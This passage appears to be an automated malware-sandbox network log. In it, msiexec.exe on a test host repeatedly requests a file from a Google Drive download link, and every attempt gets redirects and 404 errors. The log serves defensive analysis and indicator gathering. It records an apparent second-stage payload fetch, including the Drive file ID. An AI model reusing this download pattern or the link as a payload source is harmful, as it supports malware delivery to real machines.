                                                              X-GUploader-UploadID: AFIdbgRdwd7Fv5Kv1lH39iPGzoXRW3WHictUyQMuZKxBrVkmSuYPAz0Sgpqz52glCh0apQ8GCCMObYQ
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:27 GMT
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-uyqkNyigyjZ1nIZMWNBJYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:27 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="F25sW9gnFk6rG6U8xsIebw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              32 | 192.168.2.8 | 49741 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:28 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:28 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:28 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-7pKabTsj85zW3WMUB159nA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              33 | 192.168.2.8 | 49742 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:29 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:30 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgRi3d3Y2OIlsvhVxvNWs1evwkUwMmEpZwWGb0aYWBqGH7JhEH4urKGfs-1GS82Ly9K6
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:29 GMT
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: script-src 'nonce-1FZienMMVOpxJ0EBQZLnaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:30 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="umVvkV0XR4JzD79aFVRJLw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              34 | 192.168.2.8 | 49743 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:30 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:31 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:31 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: script-src 'nonce-JMyi-dBdx_41s7-3FhsODw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              35 | 192.168.2.8 | 49744 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:31 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:32 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgTDRb1_wZSGmth2kS1GmN3fzAri9Z5-j5n635pLFeDoQGg4lLBMero5b5pAN6n9wR-W
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:32 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: script-src 'nonce-Nh0wu0yUsG5HkeFSJ4rMTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:32 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fPW8r9012PokkRm7Z_wmPA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              36 | 192.168.2.8 | 49745 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:33 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:33 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:33 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-t9zvf9s6mPOXoMbGZlEoNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              37 | 192.168.2.8 | 49746 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:34 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:34 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgThbLn6N7E-FLyM8gEELYBtm-GG7SkfBHrC5-8ec9mjV93qn4HJGpeoqCsBZRZiAhWNbh_Ypk4
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:34 GMT
                                                              Content-Security-Policy: script-src 'nonce-yvyr2wOw-mtbn_1v8vZZew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:34 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tdZfA9_sNnctO-A_dqRl4A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              38 | 192.168.2.8 | 49747 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:35 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:35 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:35 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-R1d2rzRwx3bOJAjQ_-Tkxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              39 | 192.168.2.8 | 49748 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:36 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:36 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgTjowg5kWfr0Wfs6wLkunZEMZxrpbgXbyeJZpSf_Rfmv6WjT3hntnc1GKVmeTEw14vS
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:36 GMT
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-_Vczn3OFxjJ22lwq6h98UA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:36 UTC  1652               IN
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hhTqN0Ob44UNK9uQyMQo_w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              40          192.168.2.8  49749        216.58.206.46   443               2160  C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp                Bytes transferred  Direction  Data
